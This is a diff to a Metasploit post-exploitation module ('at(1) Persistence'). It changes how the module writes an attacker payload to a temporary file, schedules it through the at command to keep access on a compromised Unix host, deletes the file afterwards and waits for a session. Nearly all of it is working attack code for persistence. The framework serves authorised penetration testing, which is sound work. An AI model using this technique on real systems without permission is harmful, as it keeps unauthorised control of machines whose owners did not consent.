Fix cmd execution; use and cleanup temporary files

Author: jhart-r7

modules/exploits/multi/local/at_persistence.rb

@@ -16,6 +16,7 @@ def initialize(info = {})
         info,
         'Name'           => 'at(1) Persistence',
         'Description'    => %q(
+          This module achieves persisience by executing payloads via at(1).
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -42,7 +43,13 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('TIME', [false, 'When to run job via at(1).  Changing may require WfsDelay to be adjusted', 'now + 1 minute']),
-        OptBool.new('CLEANUP', [true, 'Delete at entry and payload after execution', true])
+        OptBool.new('CLEANUP', [true, 'Delete payload after execution', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('PATH', [false, 'Path to store payload to be executed by at(1).  Leave unset to use mktemp'])
       ]
     )
   end
@@ -56,14 +63,26 @@ def check
     end
   end
 
+  def cmd_exec(cmd)
+    super("PATH=/bin:/usr/bin:/usr/local/bin #{cmd}")
+  end
+
   def exploit
     unless check == Exploit::CheckCode::Vulnerable
       fail_with(Failure::NoAccess, 'User denied cron via at.deny')
     end
 
-    write_file("/tmp/test.sh", payload.encoded)
-    cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
+    unless payload_file = datastore['PATH'] || cmd_exec('mktemp')
+      fail_with(Failure::BadConfig, 'Unable to find suitable location for payload')
+    end
+
+    write_file(payload_file, payload.encoded)
+    cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+    register_files_for_cleanup(payload_file) if datastore['CLEANUP']
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
-    Rex.sleep(datastore['WfsDelay'].to_i)
+    0.upto(datastore['WfsDelay'].to_i) do
+      Rex.sleep(1)
+      break if session_created?
+    end
   end
 end